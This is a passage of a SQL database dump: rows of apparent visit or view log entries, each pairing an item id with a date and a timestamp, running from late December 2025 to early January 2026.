11:28:11'),(100378,2989,1,'2025-12-28','2025-12-28 11:31:15'),(100379,3257,1,'2025-12-28','2025-12-28 11:38:00'),(100380,5495,1,'2025-12-28','2025-12-28 11:49:39'),(100381,4591,1,'2025-12-28','2025-12-28 12:02:20'),(100382,4556,1,'2025-12-28','2025-12-28 12:04:59'),(100383,4556,1,'2025-12-28','2025-12-28 12:05:02'),(100384,4556,1,'2025-12-28','2025-12-28 12:05:04'),(100385,5609,1,'2025-12-28','2025-12-28 12:15:25'),(100386,5259,1,'2025-12-28','2025-12-28 12:20:46'),(100387,3273,1,'2025-12-28','2025-12-28 12:28:09'),(100388,5489,1,'2025-12-28','2025-12-28 12:28:26'),(100389,1745,1,'2025-12-28','2025-12-28 13:42:11'),(100390,2165,1,'2025-12-28','2025-12-28 13:48:06'),(100391,1782,1,'2025-12-28','2025-12-28 14:13:39'),(100392,1782,1,'2025-12-28','2025-12-28 14:13:53'),(100393,5428,1,'2025-12-28','2025-12-28 14:33:23'),(100394,472,1,'2025-12-28','2025-12-28 14:55:10'),(100395,76,1,'2025-12-28','2025-12-28 15:15:20'),(100396,1734,1,'2025-12-28','2025-12-28 15:28:08'),(100397,5406,1,'2025-12-28','2025-12-28 15:32:33'),(100398,1602,1,'2025-12-28','2025-12-28 16:27:49'),(100399,3038,1,'2025-12-28','2025-12-28 16:40:04'),(100400,5409,1,'2025-12-28','2025-12-28 16:47:19'),(100401,5561,1,'2025-12-28','2025-12-28 16:51:27'),(100402,5512,1,'2025-12-28','2025-12-28 17:40:14'),(100403,5567,1,'2025-12-28','2025-12-28 17:47:28'),(100404,5502,1,'2025-12-28','2025-12-28 18:12:16'),(100405,2411,1,'2025-12-28','2025-12-28 18:52:32'),(100406,4977,1,'2025-12-28','2025-12-28 19:04:08'),(100407,1732,1,'2025-12-28','2025-12-28 19:15:30'),(100408,3069,1,'2025-12-28','2025-12-28 19:45:42'),(100409,5397,1,'2025-12-28','2025-12-28 19:51:54'),(100410,4944,1,'2025-12-28','2025-12-28 20:19:45'),(100411,5436,1,'2025-12-28','2025-12-28 20:40:48'),(100412,5449,1,'2025-12-28','2025-12-28 20:43:50'),(100413,2457,1,'2025-12-28','2025-12-28 20:46:53'),(100414,5420,1,'2025-12-28','2025-12-28 21:05:37'),(100415,1586,1,'2025-12-28','2025-12-28 21:12:50'),(100416,3706,1,'2025-12-28','2025-12-28 21:47:12'),(100417,1590,1,'2025-12-28','2025-12-28 21:56:25'),(100418,5292,1,'2025-12-28','2025-12-28 22:35:55'),(100419,5292,1,'2025-12-28','2025-12-28 22:35:58'),(100420,5457,1,'2025-12-28','2025-12-28 22:36:14'),(100421,5526,1,'2025-12-28','2025-12-28 22:49:23'),(100422,1582,1,'2025-12-28','2025-12-28 22:58:39'),(100423,5636,1,'2025-12-28','2025-12-28 23:37:22'),(100424,5639,1,'2025-12-28','2025-12-28 23:42:29'),(100425,5639,1,'2025-12-28','2025-12-28 23:42:29'),(100426,74,1,'2025-12-28','2025-12-28 23:43:54'),(100427,2503,1,'2025-12-28','2025-12-28 23:44:10'),(100428,80,1,'2025-12-28','2025-12-28 23:44:24'),(100429,80,1,'2025-12-28','2025-12-28 23:47:50'),(100430,80,1,'2025-12-28','2025-12-28 23:50:25'),(100431,80,1,'2025-12-28','2025-12-28 23:53:00'),(100432,80,1,'2025-12-28','2025-12-28 23:53:17'),(100433,5570,1,'2025-12-29','2025-12-29 00:04:36'),(100434,80,1,'2025-12-29','2025-12-29 00:16:32'),(100435,5639,1,'2025-12-29','2025-12-29 01:02:00'),(100436,1586,1,'2025-12-29','2025-12-29 01:06:40'),(100437,4688,1,'2025-12-29','2025-12-29 01:26:10'),(100438,5492,1,'2025-12-29','2025-12-29 01:47:29'),(100439,5397,1,'2025-12-29','2025-12-29 01:50:20'),(100440,5157,1,'2025-12-29','2025-12-29 01:58:12'),(100441,5400,1,'2025-12-29','2025-12-29 01:59:55'),(100442,4529,1,'2025-12-29','2025-12-29 02:05:07'),(100443,72,1,'2025-12-29','2025-12-29 02:14:09'),(100444,5425,1,'2025-12-29','2025-12-29 02:19:38'),(100445,470,1,'2025-12-29','2025-12-29 02:20:23'),(100446,4681,1,'2025-12-29','2025-12-29 02:26:00'),(100447,4832,1,'2025-12-29','2025-12-29 02:30:53'),(100448,4546,1,'2025-12-29','2025-12-29 02:42:22'),(100449,5464,1,'2025-12-29','2025-12-29 02:42:49'),(100450,3278,1,'2025-12-29','2025-12-29 02:49:07'),(100451,4712,1,'2025-12-29','2025-12-29 02:59:19'),(100452,5356,1,'2025-12-29','2025-12-29 03:03:22'),(100453,335,1,'2025-12-29','2025-12-29 03:21:46'),(100454,5457,1,'2025-12-29','2025-12-29 03:32:50'),(100455,5428,1,'2025-12-29','2025-12-29 03:41:21'),(100456,3273,1,'2025-12-29','2025-12-29 03:50:49'),(100457,4722,1,'2025-12-29','2025-12-29 04:06:01'),(100458,5412,1,'2025-12-29','2025-12-29 04:07:01'),(100459,5549,1,'2025-12-29','2025-12-29 05:31:22'),(100460,3117,1,'2025-12-29','2025-12-29 06:05:58'),(100461,5433,1,'2025-12-29','2025-12-29 06:51:09'),(100462,2904,1,'2025-12-29','2025-12-29 07:11:08'),(100463,91,1,'2025-12-29','2025-12-29 07:44:20'),(100464,4428,1,'2025-12-29','2025-12-29 08:21:29'),(100465,3229,1,'2025-12-29','2025-12-29 08:29:39'),(100466,4759,1,'2025-12-29','2025-12-29 08:57:40'),(100467,3180,1,'2025-12-29','2025-12-29 09:05:25'),(100468,5441,1,'2025-12-29','2025-12-29 09:11:26'),(100469,5125,1,'2025-12-29','2025-12-29 09:13:31'),(100470,5601,1,'2025-12-29','2025-12-29 09:15:08'),(100471,5601,1,'2025-12-29','2025-12-29 09:15:09'),(100472,2775,1,'2025-12-29','2025-12-29 10:19:26'),(100473,2775,1,'2025-12-29','2025-12-29 10:19:28'),(100474,1766,1,'2025-12-29','2025-12-29 10:38:52'),(100475,485,1,'2025-12-29','2025-12-29 10:39:46'),(100476,4779,1,'2025-12-29','2025-12-29 10:46:47'),(100477,3034,1,'2025-12-29','2025-12-29 11:32:57'),(100478,2457,1,'2025-12-29','2025-12-29 11:46:35'),(100479,1602,1,'2025-12-29','2025-12-29 13:03:32'),(100480,4719,1,'2025-12-29','2025-12-29 13:03:46'),(100481,5682,1,'2025-12-29','2025-12-29 13:59:29'),(100482,5682,1,'2025-12-29','2025-12-29 13:59:30'),(100483,80,1,'2025-12-29','2025-12-29 14:30:35'),(100484,3731,1,'2025-12-29','2025-12-29 14:46:25'),(100485,72,1,'2025-12-29','2025-12-29 15:41:16'),(100486,5292,1,'2025-12-29','2025-12-29 16:15:17'),(100487,4983,1,'2025-12-29','2025-12-29 16:45:26'),(100488,5461,1,'2025-12-29','2025-12-29 17:12:18'),(100489,3486,1,'2025-12-29','2025-12-29 17:15:24'),(100490,5323,1,'2025-12-29','2025-12-29 17:24:46'),(100491,5502,1,'2025-12-29','2025-12-29 18:04:28'),(100492,4950,1,'2025-12-29','2025-12-29 18:23:50'),(100493,68,1,'2025-12-29','2025-12-29 18:24:44'),(100494,87,1,'2025-12-29','2025-12-29 18:25:41'),(100495,335,1,'2025-12-29','2025-12-29 18:25:59'),(100496,4930,1,'2025-12-29','2025-12-29 18:26:29'),(100497,4950,1,'2025-12-29','2025-12-29 18:26:43'),(100498,4416,1,'2025-12-29','2025-12-29 18:37:20'),(100499,110,1,'2025-12-29','2025-12-29 19:04:05'),(100500,3781,1,'2025-12-29','2025-12-29 19:10:22'),(100501,5122,1,'2025-12-29','2025-12-29 19:36:06'),(100502,5428,1,'2025-12-29','2025-12-29 19:51:44'),(100503,3253,1,'2025-12-29','2025-12-29 20:08:06'),(100504,3261,1,'2025-12-29','2025-12-29 20:08:54'),(100505,5433,1,'2025-12-29','2025-12-29 20:43:28'),(100506,1608,1,'2025-12-29','2025-12-29 20:59:22'),(100507,5502,1,'2025-12-29','2025-12-29 21:20:59'),(100508,87,1,'2025-12-29','2025-12-29 21:23:45'),(100509,5264,1,'2025-12-29','2025-12-29 21:38:23'),(100510,5512,1,'2025-12-29','2025-12-29 22:35:32'),(100511,5457,1,'2025-12-29','2025-12-29 22:37:44'),(100512,4428,1,'2025-12-29','2025-12-29 22:50:19'),(100513,3083,1,'2025-12-29','2025-12-29 22:54:22'),(100514,4660,1,'2025-12-29','2025-12-29 23:29:59'),(100515,3275,1,'2025-12-29','2025-12-29 23:41:24'),(100516,5567,1,'2025-12-29','2025-12-29 23:52:19'),(100517,4950,1,'2025-12-30','2025-12-30 00:46:09'),(100518,5454,1,'2025-12-30','2025-12-30 01:12:24'),(100519,4416,1,'2025-12-30','2025-12-30 01:20:42'),(100520,3664,1,'2025-12-30','2025-12-30 01:20:47'),(100521,3102,1,'2025-12-30','2025-12-30 01:59:21'),(100522,4373,1,'2025-12-30','2025-12-30 02:18:36'),(100523,1604,1,'2025-12-30','2025-12-30 02:34:31'),(100524,1602,1,'2025-12-30','2025-12-30 02:35:40'),(100525,5400,1,'2025-12-30','2025-12-30 02:44:55'),(100526,4529,1,'2025-12-30','2025-12-30 02:56:27'),(100527,5425,1,'2025-12-30','2025-12-30 04:03:44'),(100528,2775,1,'2025-12-30','2025-12-30 04:48:55'),(100529,72,1,'2025-12-30','2025-12-30 05:11:56'),(100530,80,1,'2025-12-30','2025-12-30 05:14:24'),(100531,4432,1,'2025-12-30','2025-12-30 05:46:15'),(100532,1737,1,'2025-12-30','2025-12-30 06:12:54'),(100533,3486,1,'2025-12-30','2025-12-30 06:58:34'),(100534,5363,1,'2025-12-30','2025-12-30 07:00:38'),(100535,1608,1,'2025-12-30','2025-12-30 07:10:13'),(100536,110,1,'2025-12-30','2025-12-30 07:12:08'),(100537,2751,1,'2025-12-30','2025-12-30 07:24:47'),(100538,89,1,'2025-12-30','2025-12-30 07:36:24'),(100539,5539,1,'2025-12-30','2025-12-30 07:49:15'),(100540,5593,1,'2025-12-30','2025-12-30 07:49:34'),(100541,4663,1,'2025-12-30','2025-12-30 07:57:11'),(100542,5428,1,'2025-12-30','2025-12-30 08:08:01'),(100543,91,1,'2025-12-30','2025-12-30 08:18:25'),(100544,3243,1,'2025-12-30','2025-12-30 09:30:30'),(100545,4835,1,'2025-12-30','2025-12-30 09:31:55'),(100546,3273,1,'2025-12-30','2025-12-30 09:53:12'),(100547,4529,1,'2025-12-30','2025-12-30 09:54:32'),(100548,2813,1,'2025-12-30','2025-12-30 09:58:44'),(100549,4980,1,'2025-12-30','2025-12-30 10:05:56'),(100550,2558,1,'2025-12-30','2025-12-30 10:29:08'),(100551,110,1,'2025-12-30','2025-12-30 10:38:50'),(100552,5464,1,'2025-12-30','2025-12-30 11:11:38'),(100553,5412,1,'2025-12-30','2025-12-30 11:26:15'),(100554,4950,1,'2025-12-30','2025-12-30 11:31:26'),(100555,3781,1,'2025-12-30','2025-12-30 11:53:44'),(100556,110,1,'2025-12-30','2025-12-30 11:56:44'),(100557,1544,1,'2025-12-30','2025-12-30 12:03:54'),(100558,5530,1,'2025-12-30','2025-12-30 12:30:37'),(100559,110,1,'2025-12-30','2025-12-30 12:33:46'),(100560,110,1,'2025-12-30','2025-12-30 12:45:52'),(100561,110,1,'2025-12-30','2025-12-30 13:17:27'),(100562,5406,1,'2025-12-30','2025-12-30 13:31:05'),(100563,3117,1,'2025-12-30','2025-12-30 14:09:41'),(100564,5259,1,'2025-12-30','2025-12-30 14:18:55'),(100565,1608,1,'2025-12-30','2025-12-30 14:26:38'),(100566,482,1,'2025-12-30','2025-12-30 14:32:05'),(100567,110,1,'2025-12-30','2025-12-30 14:45:18'),(100568,2904,1,'2025-12-30','2025-12-30 14:50:32'),(100569,110,1,'2025-12-30','2025-12-30 15:30:16'),(100570,3710,1,'2025-12-30','2025-12-30 15:32:23'),(100571,5140,1,'2025-12-30','2025-12-30 15:38:14'),(100572,5428,1,'2025-12-30','2025-12-30 15:41:17'),(100573,3038,1,'2025-12-30','2025-12-30 15:48:22'),(100574,110,1,'2025-12-30','2025-12-30 16:41:42'),(100575,3273,1,'2025-12-30','2025-12-30 16:53:45'),(100576,2956,1,'2025-12-30','2025-12-30 17:02:09'),(100577,110,1,'2025-12-30','2025-12-30 17:15:52'),(100578,3045,1,'2025-12-30','2025-12-30 17:31:14'),(100579,4420,1,'2025-12-30','2025-12-30 17:56:29'),(100580,4977,1,'2025-12-30','2025-12-30 18:05:50'),(100581,4830,1,'2025-12-30','2025-12-30 18:16:48'),(100582,1600,1,'2025-12-30','2025-12-30 18:19:42'),(100583,5157,1,'2025-12-30','2025-12-30 18:24:56'),(100584,3056,1,'2025-12-30','2025-12-30 18:46:27'),(100585,110,1,'2025-12-30','2025-12-30 19:02:05'),(100586,3498,1,'2025-12-30','2025-12-30 19:05:42'),(100587,5436,1,'2025-12-30','2025-12-30 19:06:15'),(100588,5449,1,'2025-12-30','2025-12-30 19:07:18'),(100589,72,1,'2025-12-30','2025-12-30 19:16:13'),(100590,4637,1,'2025-12-30','2025-12-30 19:30:17'),(100591,5420,1,'2025-12-30','2025-12-30 19:30:23'),(100592,3297,1,'2025-12-30','2025-12-30 20:11:58'),(100593,3055,1,'2025-12-30','2025-12-30 20:52:05'),(100594,5674,1,'2025-12-30','2025-12-30 20:58:41'),(100595,2558,1,'2025-12-30','2025-12-30 21:30:12'),(100596,5461,1,'2025-12-30','2025-12-30 21:45:09'),(100597,5116,1,'2025-12-30','2025-12-30 21:51:32'),(100598,3486,1,'2025-12-30','2025-12-30 21:52:23'),(100599,4691,1,'2025-12-30','2025-12-30 22:18:38'),(100600,5492,1,'2025-12-30','2025-12-30 22:42:42'),(100601,5346,1,'2025-12-30','2025-12-30 23:02:06'),(100602,5307,1,'2025-12-30','2025-12-30 23:16:57'),(100603,110,1,'2025-12-30','2025-12-30 23:58:07'),(100604,5464,1,'2025-12-31','2025-12-31 00:20:47'),(100605,5317,1,'2025-12-31','2025-12-31 00:34:19'),(100606,4996,1,'2025-12-31','2025-12-31 01:04:40'),(100607,5454,1,'2025-12-31','2025-12-31 01:12:44'),(100608,5409,1,'2025-12-31','2025-12-31 01:51:46'),(100609,4776,1,'2025-12-31','2025-12-31 01:54:16'),(100610,1602,1,'2025-12-31','2025-12-31 02:03:45'),(100611,3280,1,'2025-12-31','2025-12-31 02:04:17'),(100612,1722,1,'2025-12-31','2025-12-31 02:04:54'),(100613,4792,1,'2025-12-31','2025-12-31 02:06:57'),(100614,2775,1,'2025-12-31','2025-12-31 02:07:16'),(100615,5557,1,'2025-12-31','2025-12-31 02:08:55'),(100616,5499,1,'2025-12-31','2025-12-31 02:10:02'),(100617,5464,1,'2025-12-31','2025-12-31 02:11:52'),(100618,5033,1,'2025-12-31','2025-12-31 02:17:35'),(100619,4785,1,'2025-12-31','2025-12-31 02:18:29'),(100620,1594,1,'2025-12-31','2025-12-31 02:22:39'),(100621,4517,1,'2025-12-31','2025-12-31 02:24:49'),(100622,3746,1,'2025-12-31','2025-12-31 02:25:27'),(100623,4238,1,'2025-12-31','2025-12-31 02:26:43'),(100624,2989,1,'2025-12-31','2025-12-31 02:27:19'),(100625,68,1,'2025-12-31','2025-12-31 02:28:27'),(100626,72,1,'2025-12-31','2025-12-31 02:30:12'),(100627,5153,1,'2025-12-31','2025-12-31 02:30:40'),(100628,4520,1,'2025-12-31','2025-12-31 02:31:46'),(100629,5622,1,'2025-12-31','2025-12-31 02:32:14'),(100630,5618,1,'2025-12-31','2025-12-31 02:33:21'),(100631,4498,1,'2025-12-31','2025-12-31 02:35:39'),(100632,5330,1,'2025-12-31','2025-12-31 02:36:15'),(100633,4492,1,'2025-12-31','2025-12-31 02:36:53'),(100634,3675,1,'2025-12-31','2025-12-31 02:37:42'),(100635,5502,1,'2025-12-31','2025-12-31 02:39:31'),(100636,4677,1,'2025-12-31','2025-12-31 02:39:43'),(100637,4963,1,'2025-12-31','2025-12-31 02:40:15'),(100638,3127,1,'2025-12-31','2025-12-31 02:41:55'),(100639,3721,1,'2025-12-31','2025-12-31 02:42:43'),(100640,2410,1,'2025-12-31','2025-12-31 02:43:20'),(100641,4329,1,'2025-12-31','2025-12-31 02:43:33'),(100642,5001,1,'2025-12-31','2025-12-31 02:45:07'),(100643,478,1,'2025-12-31','2025-12-31 02:46:10'),(100644,1728,1,'2025-12-31','2025-12-31 02:50:26'),(100645,467,1,'2025-12-31','2025-12-31 02:50:54'),(100646,1707,1,'2025-12-31','2025-12-31 02:51:49'),(100647,4326,1,'2025-12-31','2025-12-31 02:52:03'),(100648,3585,1,'2025-12-31','2025-12-31 02:56:25'),(100649,3704,1,'2025-12-31','2025-12-31 02:56:41'),(100650,2063,1,'2025-12-31','2025-12-31 02:58:05'),(100651,3498,1,'2025-12-31','2025-12-31 02:58:41'),(100652,4657,1,'2025-12-31','2025-12-31 02:58:58'),(100653,3063,1,'2025-12-31','2025-12-31 02:59:13'),(100654,5578,1,'2025-12-31','2025-12-31 03:01:21'),(100655,3694,1,'2025-12-31','2025-12-31 03:10:07'),(100656,3788,1,'2025-12-31','2025-12-31 03:10:45'),(100657,4489,1,'2025-12-31','2025-12-31 03:12:10'),(100658,480,1,'2025-12-31','2025-12-31 03:13:52'),(100659,3742,1,'2025-12-31','2025-12-31 03:18:39'),(100660,484,1,'2025-12-31','2025-12-31 03:20:02'),(100661,5314,1,'2025-12-31','2025-12-31 03:22:50'),(100662,5024,1,'2025-12-31','2025-12-31 03:22:58'),(100663,5353,1,'2025-12-31','2025-12-31 03:24:08'),(100664,5425,1,'2025-12-31','2025-12-31 03:24:36'),(100665,3090,1,'2025-12-31','2025-12-31 03:26:41'),(100666,3531,1,'2025-12-31','2025-12-31 03:26:50'),(100667,469,1,'2025-12-31','2025-12-31 03:30:50'),(100668,5598,1,'2025-12-31','2025-12-31 03:31:07'),(100669,5062,1,'2025-12-31','2025-12-31 03:31:08'),(100670,4779,1,'2025-12-31','2025-12-31 03:31:42'),(100671,4950,1,'2025-12-31','2025-12-31 03:35:03'),(100672,1770,1,'2025-12-31','2025-12-31 03:37:23'),(100673,4750,1,'2025-12-31','2025-12-31 03:37:48'),(100674,5449,1,'2025-12-31','2025-12-31 03:40:27'),(100675,4883,1,'2025-12-31','2025-12-31 03:42:03'),(100676,5320,1,'2025-12-31','2025-12-31 03:42:53'),(100677,5522,1,'2025-12-31','2025-12-31 03:43:08'),(100678,1749,1,'2025-12-31','2025-12-31 03:43:23'),(100679,4837,1,'2025-12-31','2025-12-31 03:46:57'),(100680,3267,1,'2025-12-31','2025-12-31 03:51:43'),(100681,3034,1,'2025-12-31','2025-12-31 03:53:42'),(100682,1778,1,'2025-12-31','2025-12-31 03:54:46'),(100683,4357,1,'2025-12-31','2025-12-31 03:55:29'),(100684,1774,1,'2025-12-31','2025-12-31 04:01:18'),(100685,5337,1,'2025-12-31','2025-12-31 04:04:57'),(100686,1588,1,'2025-12-31','2025-12-31 04:05:21'),(100687,4685,1,'2025-12-31','2025-12-31 04:07:17'),(100688,5539,1,'2025-12-31','2025-12-31 04:08:16'),(100689,4582,1,'2025-12-31','2025-12-31 04:09:36'),(100690,4420,1,'2025-12-31','2025-12-31 04:22:24'),(100691,4950,1,'2025-12-31','2025-12-31 04:54:10'),(100692,4960,1,'2025-12-31','2025-12-31 05:02:21'),(100693,5157,1,'2025-12-31','2025-12-31 05:05:01'),(100694,91,1,'2025-12-31','2025-12-31 09:00:55'),(100695,1596,1,'2025-12-31','2025-12-31 09:25:11'),(100696,2161,1,'2025-12-31','2025-12-31 10:16:02'),(100697,3489,1,'2025-12-31','2025-12-31 10:26:13'),(100698,5495,1,'2025-12-31','2025-12-31 10:27:00'),(100699,4618,1,'2025-12-31','2025-12-31 10:45:11'),(100700,5020,1,'2025-12-31','2025-12-31 10:46:56'),(100701,4878,1,'2025-12-31','2025-12-31 10:47:38'),(100702,5005,1,'2025-12-31','2025-12-31 10:48:23'),(100703,4396,1,'2025-12-31','2025-12-31 10:53:48'),(100704,5682,1,'2025-12-31','2025-12-31 10:58:17'),(100705,5037,1,'2025-12-31','2025-12-31 11:32:25'),(100706,4457,1,'2025-12-31','2025-12-31 13:31:18'),(100707,4888,1,'2025-12-31','2025-12-31 13:44:42'),(100708,76,1,'2025-12-31','2025-12-31 13:50:25'),(100709,4542,1,'2025-12-31','2025-12-31 13:52:26'),(100710,4963,1,'2025-12-31','2025-12-31 14:05:20'),(100711,1718,1,'2025-12-31','2025-12-31 14:15:28'),(100712,4622,1,'2025-12-31','2025-12-31 14:25:13'),(100713,5310,1,'2025-12-31','2025-12-31 14:27:27'),(100714,2395,1,'2025-12-31','2025-12-31 14:28:52'),(100715,5140,1,'2025-12-31','2025-12-31 14:36:32'),(100716,5276,1,'2025-12-31','2025-12-31 14:43:46'),(100717,5545,1,'2025-12-31','2025-12-31 15:14:04'),(100718,4930,1,'2025-12-31','2025-12-31 15:22:47'),(100719,5518,1,'2025-12-31','2025-12-31 15:37:22'),(100720,3742,1,'2025-12-31','2025-12-31 15:39:20'),(100721,4582,1,'2025-12-31','2025-12-31 15:41:59'),(100722,4382,1,'2025-12-31','2025-12-31 15:59:24'),(100723,2178,1,'2025-12-31','2025-12-31 16:01:22'),(100724,5359,1,'2025-12-31','2025-12-31 16:05:00'),(100725,2410,1,'2025-12-31','2025-12-31 16:09:56'),(100726,3498,1,'2025-12-31','2025-12-31 16:12:46'),(100727,4963,1,'2025-12-31','2025-12-31 16:18:00'),(100728,5406,1,'2025-12-31','2025-12-31 16:26:30'),(100729,4980,1,'2025-12-31','2025-12-31 16:30:48'),(100730,2769,1,'2025-12-31','2025-12-31 16:44:43'),(100731,5502,1,'2025-12-31','2025-12-31 18:08:48'),(100732,1728,1,'2025-12-31','2025-12-31 18:24:41'),(100733,3307,1,'2025-12-31','2025-12-31 18:27:51'),(100734,84,1,'2025-12-31','2025-12-31 18:37:21'),(100735,5397,1,'2025-12-31','2025-12-31 19:18:46'),(100736,2704,1,'2025-12-31','2025-12-31 19:19:17'),(100737,5549,1,'2025-12-31','2025-12-31 19:44:22'),(100738,3069,1,'2025-12-31','2025-12-31 19:51:34'),(100739,5397,1,'2025-12-31','2025-12-31 19:58:57'),(100740,2161,1,'2025-12-31','2025-12-31 20:17:29'),(100741,4966,1,'2025-12-31','2025-12-31 20:34:57'),(100742,4893,1,'2025-12-31','2025-12-31 21:02:32'),(100743,5433,1,'2025-12-31','2025-12-31 21:04:46'),(100744,3691,1,'2025-12-31','2025-12-31 21:07:59'),(100745,4436,1,'2025-12-31','2025-12-31 23:00:26'),(100746,4612,1,'2025-12-31','2025-12-31 23:13:03'),(100747,5304,1,'2025-12-31','2025-12-31 23:21:18'),(100748,108,1,'2025-12-31','2025-12-31 23:36:22'),(100749,5512,1,'2025-12-31','2025-12-31 23:57:12'),(100750,74,1,'2026-01-01','2026-01-01 00:08:51'),(100751,5570,1,'2026-01-01','2026-01-01 00:09:30'),(100752,72,1,'2026-01-01','2026-01-01 00:17:46'),(100753,5454,1,'2026-01-01','2026-01-01 00:17:47'),(100754,3742,1,'2026-01-01','2026-01-01 00:35:06'),(100755,4963,1,'2026-01-01','2026-01-01 00:40:21'),(100756,4622,1,'2026-01-01','2026-01-01 00:52:50'),(100757,4930,1,'2026-01-01','2026-01-01 00:55:20'),(100758,3788,1,'2026-01-01','2026-01-01 01:26:07'),(100759,5412,1,'2026-01-01','2026-01-01 02:02:53'),(100760,5406,1,'2026-01-01','2026-01-01 02:07:19'),(100761,3117,1,'2026-01-01','2026-01-01 02:09:19'),(100762,2904,1,'2026-01-01','2026-01-01 02:10:23'),(100763,5409,1,'2026-01-01','2026-01-01 02:13:32'),(100764,3038,1,'2026-01-01','2026-01-01 02:13:32'),(100765,5441,1,'2026-01-01','2026-01-01 02:14:38'),(100766,72,1,'2026-01-01','2026-01-01 02:36:34'),(100767,1766,1,'2026-01-01','2026-01-01 02:46:46'),(100768,5484,1,'2026-01-01','2026-01-01 03:36:09'),(100769,1602,1,'2026-01-01','2026-01-01 03:36:20'),(100770,3710,1,'2026-01-01','2026-01-01 03:37:14'),(100771,5461,1,'2026-01-01','2026-01-01 03:49:26'),(100772,4983,1,'2026-01-01','2026-01-01 04:06:41'),(100773,5461,1,'2026-01-01','2026-01-01 04:10:54'),(100774,3486,1,'2026-01-01','2026-01-01 04:10:54'),(100775,5492,1,'2026-01-01','2026-01-01 04:15:13'),(100776,4681,1,'2026-01-01','2026-01-01 04:20:27'),(100777,4712,1,'2026-01-01','2026-01-01 04:22:34'),(100778,5549,1,'2026-01-01','2026-01-01 05:24:10'),(100779,1703,1,'2026-01-01','2026-01-01 05:41:50'),(100780,3781,1,'2026-01-01','2026-01-01 07:32:08'),(100781,2457,1,'2026-01-01','2026-01-01 08:38:21'),(100782,1582,1,'2026-01-01','2026-01-01 09:01:44'),(100783,91,1,'2026-01-01','2026-01-01 09:52:15'),(100784,5101,1,'2026-01-01','2026-01-01 10:16:58'),(100785,5467,1,'2026-01-01','2026-01-01 10:26:30'),(100786,4697,1,'2026-01-01','2026-01-01 10:53:42'),(100787,3742,1,'2026-01-01','2026-01-01 11:07:01'),(100788,5578,1,'2026-01-01','2026-01-01 11:20:23'),(100789,91,1,'2026-01-01','2026-01-01 13:12:06'),(100790,74,1,'2026-01-01','2026-01-01 13:15:23'),(100791,1709,1,'2026-01-01','2026-01-01 13:48:25'),(100792,5397,1,'2026-01-01','2026-01-01 14:28:25'),(100793,2993,1,'2026-01-01','2026-01-01 16:47:50'),(100794,5301,1,'2026-01-01','2026-01-01 17:04:53'),(100795,5268,1,'2026-01-01','2026-01-01 17:08:10'),(100796,3307,1,'2026-01-01','2026-01-01 17:15:28'),(100797,3781,1,'2026-01-01','2026-01-01 17:20:46'),(100798,5397,1,'2026-01-01','2026-01-01 17:22:53'),(100799,5515,1,'2026-01-01','2026-01-01 17:24:53'),(100800,5433,1,'2026-01-01','2026-01-01 17:25:58'),(100801,5512,1,'2026-01-01','2026-01-01 17:35:36'),(100802,5457,1,'2026-01-01','2026-01-01 17:35:36'),(100803,4971,1,'2026-01-01','2026-01-01 17:40:33'),(100804,5578,1,'2026-01-01','2026-01-01 17:55:44'),(100805,3104,1,'2026-01-01','2026-01-01 17:59:44'),(100806,4722,1,'2026-01-01','2026-01-01 18:03:08'),(100807,5406,1,'2026-01-01','2026-01-01 18:09:03'),(100808,3117,1,'2026-01-01','2026-01-01 18:10:50'),(100809,5428,1,'2026-01-01','2026-01-01 18:15:03'),(100810,5561,1,'2026-01-01','2026-01-01 18:17:54'),(100811,5125,1,'2026-01-01','2026-01-01 18:17:54'),(100812,5441,1,'2026-01-01','2026-01-01 18:17:56'),(100813,3045,1,'2026-01-01','2026-01-01 18:25:51'),(100814,4977,1,'2026-01-01','2026-01-01 18:31:03'),(100815,3430,1,'2026-01-01','2026-01-01 18:38:14'),(100816,5436,1,'2026-01-01','2026-01-01 18:39:42'),(100817,5449,1,'2026-01-01','2026-01-01 18:39:43'),(100818,5420,1,'2026-01-01','2026-01-01 18:41:41'),(100819,4977,1,'2026-01-01','2026-01-01 18:44:42'),(100820,4983,1,'2026-01-01','2026-01-01 18:50:16'),(100821,3486,1,'2026-01-01','2026-01-01 18:55:33'),(100822,5492,1,'2026-01-01','2026-01-01 18:59:50'),(100823,4681,1,'2026-01-01','2026-01-01 19:07:59'),(100824,5464,1,'2026-01-01','2026-01-01 19:08:07'),(100825,4712,1,'2026-01-01','2026-01-01 19:10:06'),(100826,335,1,'2026-01-01','2026-01-01 19:18:21'),(100827,3749,1,'2026-01-01','2026-01-01 19:21:21'),(100828,3290,1,'2026-01-01','2026-01-01 19:28:52'),(100829,5588,1,'2026-01-01','2026-01-01 20:02:13'),(100830,5320,1,'2026-01-01','2026-01-01 22:04:12'),(100831,4866,1,'2026-01-01','2026-01-01 22:24:45'),(100832,4944,1,'2026-01-01','2026-01-01 23:03:39'),(100833,3079,1,'2026-01-01','2026-01-01 23:11:06'),(100834,1584,1,'2026-01-01','2026-01-01 23:53:14'),(100835,3791,1,'2026-01-01','2026-01-01 23:58:59'),(100836,5363,1,'2026-01-02','2026-01-02 00:05:47'),(100837,3313,1,'2026-01-02','2026-01-02 00:34:15'),(100838,5436,1,'2026-01-02','2026-01-02 00:41:19'),(100839,5489,1,'2026-01-02','2026-01-02 00:46:34'),(100840,4582,1,'2026-01-02','2026-01-02 00:49:29'),(100841,4771,1,'2026-01-02','2026-01-02 01:02:54'),(100842,5567,1,'2026-01-02','2026-01-02 01:05:16'),(100843,108,1,'2026-01-02','2026-01-02 01:36:34'),(100844,1772,1,'2026-01-02','2026-01-02 01:55:18'),(100845,1602,1,'2026-01-02','2026-01-02 02:30:17'),(100846,3038,1,'2026-01-02','2026-01-02 02:47:32'),(100847,5062,1,'2026-01-02','2026-01-02 03:05:41'),(100848,2804,1,'2026-01-02','2026-01-02 03:27:00'),(100849,5119,1,'2026-01-02','2026-01-02 03:54:27'),(100850,84,1,'2026-01-02','2026-01-02 04:02:34'),(100851,5467,1,'2026-01-02','2026-01-02 04:04:00'),(100852,4582,1,'2026-01-02','2026-01-02 04:09:30'),(100853,3072,1,'2026-01-02','2026-01-02 05:04:25'),(100854,468,1,'2026-01-02','2026-01-02 05:04:59'),(100855,91,1,'2026-01-02','2026-01-02 05:05:59'),(100856,2609,1,'2026-01-02','2026-01-02 05:08:50'),(100857,5397,1,'2026-01-02','2026-01-02 06:07:34'),(100858,5539,1,'2026-01-02','2026-01-02 06:30:03'),(100859,3742,1,'2026-01-02','2026-01-02 06:35:31'),(100860,4436,1,'2026-01-02','2026-01-02 07:56:04'),(100861,4412,1,'2026-01-02','2026-01-02 07:56:19'),(100862,3738,1,'2026-01-02','2026-01-02 